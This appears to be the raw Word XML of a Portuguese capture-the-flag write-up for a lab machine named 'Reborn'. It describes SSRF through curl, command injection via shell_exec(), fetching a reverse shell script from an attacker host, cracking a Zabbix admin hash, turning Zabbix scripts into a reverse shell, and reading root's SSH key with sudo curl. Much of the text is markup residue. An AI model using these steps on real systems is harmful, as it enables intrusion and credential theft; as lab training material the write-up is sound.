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lab5yc6k7iz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cq9x82bpsj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Reborn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1yecqyfws69t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enumeração da máquina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portas abertas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serviços expostos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alvo.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5600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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identificou duas portas abertas no sistema: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acessar a aplicação web pela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fomos direcionados para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interface principal da aplicação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que o serviço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ativo e acessível.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 web existe um campo de entrada que recebe uma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Informamos o nosso endereço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verificar se a aplicação realiza requisições externas a partir desse input.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observado que a aplicação realiza uma requisição HTTP para o endereço IP informado,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User-Agent do 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back-end utiliza o curl para realizar requisições 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3563"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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abusar de opções nativas da ferramenta que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permite ler arquivos locais e escrever arquivos no sistema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caso a entrada do usuário não seja validada adequadamente.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uso do curl, foi possível ler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/etc/passwd do sistema Linux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http://&lt;your-ip&gt;/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75239"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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2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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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Também foi possível ler o arquivo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> index.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, o que permitiu acesso completo ao </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">código-fonte da aplicação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@/var/www/html/index.php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70300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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7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código-fonte da aplicação disponível, realizamos a análise do código. Logo na primeira linha, foi identificada uma condição que verifica se o parâmetro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expertmode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igual à string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"tcp"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7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Caso essa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">condição seja verdadeira</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a aplicação </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">retorna e renderiza um conteúdo HTML diretamente na página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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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Ao analisar o código-fonte do back-end, foi identificado que o parâmetro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concatenado diretamente</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> em uma chamada à função </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell_exec()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, sem qualquer validação ou sanitização adequada. Essa implementação permite que dados controlados pelo usuário sejam interpretados como comandos do sistema operacional, caracterizando uma </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerabilidade de Command Injection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074"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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0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Dessa forma, foi possível </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">executar o comando id no sistema operacional</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, confirmando a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">injeção de comandos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254752"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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75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Após validar esta falha, é possível </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">obter a execução remota de comandos</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Em seguida, utilizamos o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(já identificado no back-end) para </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">baixar um arquivo de shell reversa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> hospedado em um </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">servidor HTTP simples (Python)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> controlado pelo atacante e </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">executá-lo no sistema</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, resultando no </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">estabelecimento de uma conexão reversa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> com a máquina alvo.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http://&lt;vpn-ip&gt;/shell.sh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/tmp/shell.sh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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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Em seguida, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">executamos o arquivo /tmp/shell.sh,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> o que </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">inicializa a shell reversa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estabelece a conexão com o host do atacante</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, confirmando o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">controle remoto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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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Recebemos </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uma conexão reversa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> estabelecida com o usuário </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data.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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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thk3cloq5e80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Foi realizado </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upgrade da shell para TTY interativa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, permitindo melhor controle da sessão (suporte a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL+C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CTRL+Z</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, histórico de comandos e execução de programas interativos).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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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diretório </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:b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 foi identificada a pasta </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zabbix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Dentro dela existe o diretório </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">conf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, que contém um </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">arquivo de configuração do Zabbix com as credenciais do banco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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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Foi possível </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">obter a senha do banco de dados MySQL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a partir do arquivo de configuração </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zabbix.conf.php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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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Com as credenciais obtidas, foi possível </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">acessar o banco de dados MySQL do Zabbix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o acesso ao banco de dados </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MySQL do Zabbix, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">foi possível extrair o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de senha do usuário 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diretamente da tabela </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users.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$2y$10$Qcjjtq7XauueOab601qjM.XphS50C.Z2ym5uPmf4zWQOtlibG1W6C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25400" l="25400" r="25400" t="25400"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Com o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hash obtido</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a senha foi </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">quebrada utilizando o Hashcat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, resultando na </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">credencial em texto claro do usuário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Admin:revolution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25400" l="25400" r="25400" t="2540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Com a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">senha do usuário Administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, foi possível </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">autenticar-se na aplicação web com privilégios administrativos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25400" l="25400" r="25400" t="2540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25400" l="25400" r="25400" t="2540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Após autenticar-se na aplicação, foi possível </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">acessar a seção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Alerts → Scripts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, onde estão listados </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scripts padrão do Zabbix</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, os quais podem ser executados pelo sistema conforme as permissões configuradas.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 Zabbix permite </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">editar scripts padrão</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, como </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1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Ao modificar esses scripts, é possível </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">substituir o comando original por um comando arbitrário</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, como uma </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, que será executada pelo sistema quando o script for acionado.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Após a modificação, o script é </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">salvo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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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Monitoring → Hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, executamos o script de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previamente modificado, que agora contém o comando malicioso, resultando na </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">execução do comando no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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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Recebemos uma </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">conexão reversa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> com o usuário </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vito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25400" l="25400" r="25400" t="2540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de usuário está localizada no diretório home do usuário vito </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(/home/vito).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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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y8nkiwhdw06z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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mostra que o usuário </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vito</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> possui permissão para </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">executar o comando curl como root sem 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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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Ao executar o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é possível </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ler arquivos do sistema com privilégios de root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizando o schema </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file:///</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, permitindo acesso a arquivos restritos do sistema.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Foi possível ler o arquivo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /root/.ssh/id_rsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizando o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executado como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obtendo a chave</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> privada SSH do usuário root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, o que permite acesso remoto ao sistema com privilégios administrativos.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file:///root/.ssh/id_rsa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Utilizamos a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chave privada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nos conectar à máquina via SSH</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, obtendo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">acesso como 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551490"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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4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de root está localizada no diretório </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(/root/).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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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headerReference r:id="rId47" w:type="even"/>
      <w:footerReference r:id="rId48" w:type="default"/>
      <w:footerReference r:id="rId49" w:type="first"/>
      <w:footerReference r:id="rId5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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.fhhv04y2ormh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9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Reborn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29.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xm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footer" Target="footer1.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml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94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7.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId25" 